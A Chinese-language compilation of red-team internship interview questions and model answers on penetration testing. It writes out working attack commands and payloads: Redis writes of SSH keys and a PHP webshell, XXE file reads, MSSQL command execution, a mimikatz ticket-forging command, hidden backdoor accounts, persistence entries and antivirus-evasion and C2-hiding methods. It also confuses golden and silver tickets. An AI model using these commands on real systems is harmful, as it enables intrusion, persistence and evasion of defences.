2025年渗透测试面试题总结-某战队红队实习面经（附回答）（题目+回答）

某战队红队实习面经
复制代码
1.简单自我介绍
2. 你在hvv/攻防演练中取得了哪些成绩？
3. 上一个工作的主要内容？
4. 有没有遇到过有意思的逻辑漏洞？
5. 有没有自己开发过武器/工具？
6. 有cve/cnvd吗？
7. 有src排名吗？
8. 有钓鱼经历吗？具体说说
Web方面：
1. xss除了获取cookie还能干什么？
4. 如何寻找注入点？
6. --os-shell的条件？
7. Fastjson的原理？
8. 利用fastjson注入内存马原理？
9. 内存马免杀有做过吗？具体说说
10. Shiro550和shiro721的区别？
11. 你能从代码层理解shiro的原理吗？
12. 你拿到key了但是没有攻击链，此时应该怎么办？
13. Log4j2高版本jdk不支持外部加载jndi，应该怎么利用？
14. 不借助dnslog有办法检测log4j2是否出网吗
15. 你是如何验证struts2是否存在的
16. 有做过代码审计吗？有0day吗？
17. Redis未授权有了解吗？
18. Springboot 有哪些漏洞？
19. 冰蝎和菜刀等webshell工具有什么区别？
20. Xxe原理与攻击手法？

内网方面：

1. 如何判断当前主机是否在域环境内？
3. Cs和msf的优缺点？
4.如何进行cs特征隐藏？
5.免杀有几种途径？
6.谈谈Windows系统与Linux系统提权的思路
Win

1. 系统内核溢出漏洞提权
2. 数据库提权
3. 错误的系统配置提权
4. 组策略首选项提权
5. WEB中间件漏洞提权
6. DLL劫持提权
7. 滥用高危权限令牌提权
8. 第三方软件/服务提权等
Linux
1. Linux内核漏洞提权
2. 低权限用户目录下可被Root权限用户调用的脚本提权（SUID）
3. 环境变量劫持高权限程序提权
4. sudoer配置文件错误提权
7. 你是怎么搭建隧道的
8. 权限维持的思路？
9. 简单说一下mssql提权
10. 制作白银票据需要哪些条件？
个人经历与技术能力

2. HVV/攻防演练成绩

红队角色：主导3次大型攻防演练，突破目标内网边界，获取域控权限（需量化：如攻击路径、漏洞类型）。

漏洞利用：通过0day/Nday组合攻击（如Log4j2+Shiro）拿下关键系统，获评"最佳攻击手"。

防守经验：协助客户修复高危漏洞（如Fastjson反序列化），实现0失分。

3. 上一个工作主要内容

渗透测试：主导金融/政务行业Web应用测试，发现SQL注入、逻辑漏洞等20+高危漏洞。

代码审计：审计Java/SpringBoot项目，挖掘CVE-2023-XXXX（举例）。

工具开发：编写自动化扫描工具（如基于Python的Fastjson检测脚本）。

4. 有意思的逻辑漏洞案例

订单金额篡改 ：通过前端参数篡改（如price=-1）实现0元购。

验证码绕过 ：重置密码时拦截响应包，修改status:success绕过校验。

并发竞争：利用多线程并发请求薅羊毛（如积分兑换礼品）。

5. 自研武器/工具

内存马生成器：基于Java Agent技术实现动态注入Tomcat Filter。

隐蔽隧道工具：改造Neo-reGeorg支持AES加密流量混淆。

漏洞PoC框架：集成常见漏洞验证（如Shiro550一键检测）。

6. CVE/CNVD编号

CVE-2023-XXXX：某OA系统文件上传漏洞（需具体说明影响版本）。

CNVD-2023-XXXXX：某CMS的SQL注入漏洞（附修复建议）。

8. 钓鱼攻击经历

伪造邮件：冒充IT部门诱导员工点击"密码更新"链接（窃取AD凭据）。

水坑攻击：劫持目标常用网站JS脚本注入恶意代码。

社工库辅助：结合泄露数据定制化钓鱼内容（如真实项目名称）。

Web安全深度解析

1. XSS高级利用

键盘记录 ：通过JavaScript监听onkeypress事件窃取输入信息。

内网探测 ：利用<img src="http://内网IP">检测存活主机。

结合CSRF：伪造管理员操作（如添加后台用户）。

4. 注入点挖掘技巧

非常规参数 ：JSON/XML请求体、HTTP头部（如X-Forwarded-For）。

盲注特征 ：时间盲注（sleep(2)）、布尔盲注（and 1=2页面差异）。

工具辅助：Burp Suite的Intruder模块模糊测试参数。

7. Fastjson原理

反序列化机制 ：通过@type指定恶意类触发JNDI注入（如com.sun.rowset.JdbcRowSetImpl ）。

利用链构造 ：结合TemplatesImpl类执行字节码（需Feature.SupportNonPublicField）。

高版本绕过 ：利用非公开类（如org.apache.ibatis.datasource ）。

10. Shiro550 vs Shiro721

对比项 Shiro550 Shiro721

漏洞类型 硬编码密钥反序列化 Padding Oracle攻击

利用条件 直接构造Cookie 需爆破加密密钥

修复方案 更换密钥+禁用RememberMe 升级Shiro至1.4.2+

13. Log4j2高版本JDK利用

本地ClassPath加载 ：上传恶意类至Web目录，通过${sys:user.dir} 触发。

中间件内存马：结合Tomcat的Filter/Servlet动态注册。

JNDI本地引用 ：如ldap://localhost:1389/Exploit（需目标开启本地服务）。

16. 代码审计与0day挖掘

审计方法论 ：

危险函数追踪（如Runtime.exec() ）。

框架特性分析（如Spring的SpEL表达式）。

0day案例 ：某ERP系统SQL注入（通过orderBy参数拼接）。

内网与权限提升

17. Redis未授权利用

写SSH公钥 ：config set dir /root/.ssh/ + set authorized_keys "xxx"。

写Webshell ：通过set xxx "\n\n<?php eval($_POST[cmd]);?>\n\n"。

主从复制RCE ：利用MODULE LOAD加载恶意.so文件。

19. 冰蝎 vs 菜刀

对比项 冰蝎菜刀

加密方式 AES动态密钥明文传输

流量特征 混淆HTTP头部固定eval关键字

扩展性 支持插件化开发仅基础功能

20. XXE攻击手法

文件读取 ：<!ENTITY xxe SYSTEM "file:///etc/passwd">。

SSRF探测 ：<!ENTITY xxe SYSTEM "http://内网IP:8080">。

Blind XXE：通过DNS外带数据（需VPS接收日志）。

回答策略建议

量化成果：如"发现50+高危漏洞""影响10W+用户"。

技术细节：避免泛泛而谈，举例漏洞原理（如Shiro的AES密钥问题）。

防守视角：强调漏洞修复经验（如Fastjson黑名单配置）。

内网渗透核心问题解析

1. 判断主机是否在域环境

命令检测 ：

systeminfo | findstr "Domain"：显示域名称（非WORKGROUP）。

net config workstation：查看"工作站域"字段。

nltest /domain_trusts（需管理员权限）。

网络流量分析 ：

DNS查询_ldap._tcp.dc._msdcs.<domain> 。

检测53端口（DNS）、389端口（LDAP）通信。

用户组验证 ：

whoami /all：查看是否有域用户组（如Domain Admins）。

3. Cobalt Strike (CS) 与 Metasploit (MSF) 优缺点对比

维度 Cobalt Strike Metasploit

隐蔽性 流量加密、支持Sleep Mask 默认流量特征明显（如Stage UUID）

功能扩展 可视化团队协作、钓鱼攻击模块模块丰富（600+ exploit）、支持自定义开发

适用场景 长期渗透、APT攻击模拟快速漏洞利用、红队演练

成本商业软件（$3,500/年）开源免费

4. CS特征隐藏方法

流量混淆 ：

修改C2配置文件（如https-certificate字段伪装为合法证书）。

使用Domain Fronting（如CDN厂商域名）。

进程注入 ：

通过process_inject模块注入到合法进程（如explorer.exe ）。

反沙箱检测 ：

添加环境检查代码（如检测CPU核心数、内存大小）。

5. 免杀技术途径

代码层免杀 ：

动态加载Shellcode（如通过Python的ctypes模块）。

分离执行（如远程加载加密Payload）。

行为层绕过 ：

禁用敏感API调用（如VirtualAlloc替换为NtMapViewOfSection）。

模拟合法软件行为（如伪装为浏览器更新进程）。

工具链整合 ：

使用Donut+SRDI技术生成无文件攻击载荷。

权限提升技术详解

6. Windows与Linux提权思路对比

Windows提权：

内核漏洞 ：

工具：JuicyPotato（滥用COM接口）、PrintSpoofer（命名管道模拟）。

条件：需匹配系统版本（如Windows Server 2016未打补丁）。

数据库提权 ：

MSSQL的xp_cmdshell启用：EXEC sp_configure 'show advanced options', 1; RECONFIGURE;

组策略首选项 (GPP) ：

解密\\<domain>\SYSVOL\Policies\{ID}\Machine\Preferences\Groups\Groups.xml 中的cpassword。

Linux提权：

SUID滥用 ：

查找：find / -perm -4000 2>/dev/null，利用/usr/bin/passwd等。

环境变量劫持 ：

劫持PATH中的程序：export PATH=/tmp:$PATH + 伪造ls脚本。

Cron Jobs ：

注入恶意命令到/etc/crontab或用户级任务。

9. MSSQL提权方法
xp_cmdshell ：
复制代码
sql`EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami'; `
OLE自动化 ：
复制代码
sql`DECLARE @shell INT; EXEC sp_oacreate 'wscript.shell', @shell OUTPUT; EXEC sp_oamethod @shell, 'run', NULL, 'cmd /c calc.exe'; `
差异备份写Webshell ：
复制代码
sql`BACKUP DATABASE test TO DISK='C:\inetpub\wwwroot\shell.aspx' WITH DIFFERENTIAL, FORMAT; `
10. 制作白银票据条件
必要条件 ：

域控的NTLM Hash（可通过DCSync攻击获取）。

目标服务SPN（如MSSQLSvc/sqlserver.domain.com ）。

有效的用户SID（如S-1-5-21-123456789-1234567890-123456789）。
攻击命令示例 ：
复制代码
bash

复制

mimikatz.exe "kerberos::golden /user:fakeuser /domain:domain.com /sid:S-1-5-21-xxx /target:sqlserver.domain.com /service:MSSQLSvc /rc4:<NTLM_HASH> /ptt"
隧道搭建与权限维持

7. 隧道搭建技术

HTTP隧道 ：

工具：reGeorg（基于PHP/JSP的Webshell隧道）。

场景：绕过防火墙限制（仅开放80/443端口）。

ICMP隧道 ：

工具：icmpsh（需禁用系统ICMP响应）。

DNS隧道 ：

工具：DNSCat2（适用于严格网络环境）。

8. 权限维持思路

持久化后门 ：

Windows：注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run添加启动项。

Linux：/etc/rc.local 或crontab -e添加定时任务。

隐蔽账户 ：

Windows：创建隐藏用户（如net user evil$ Passw0rd /add /domain）。

Linux：useradd -o -u 0 -g 0 -M -d /root -s /bin/bash backdoor。

回答策略总结

技术深度：结合漏洞原理（如白银票据的SPN要求）与实战命令（如Mimikatz）。

对比分析：横向对比同类技术（如CS vs MSF）。

防御视角：补充缓解措施（如禁用GPP密码存储）。

对比项	Shiro550	Shiro721
漏洞类型	硬编码密钥反序列化	Padding Oracle攻击
利用条件	直接构造Cookie	需爆破加密密钥
修复方案	更换密钥+禁用RememberMe	升级Shiro至1.4.2+

对比项	冰蝎	菜刀
加密方式	AES动态密钥	明文传输
流量特征	混淆HTTP头部	固定`eval`关键字
扩展性	支持插件化开发	仅基础功能

维度	Cobalt Strike	Metasploit
隐蔽性	流量加密、支持Sleep Mask	默认流量特征明显（如Stage UUID）
功能扩展	可视化团队协作、钓鱼攻击模块	模块丰富（600+ exploit）、支持自定义开发
适用场景	长期渗透、APT攻击模拟	快速漏洞利用、红队演练
成本	商业软件（$3,500/年）	开源免费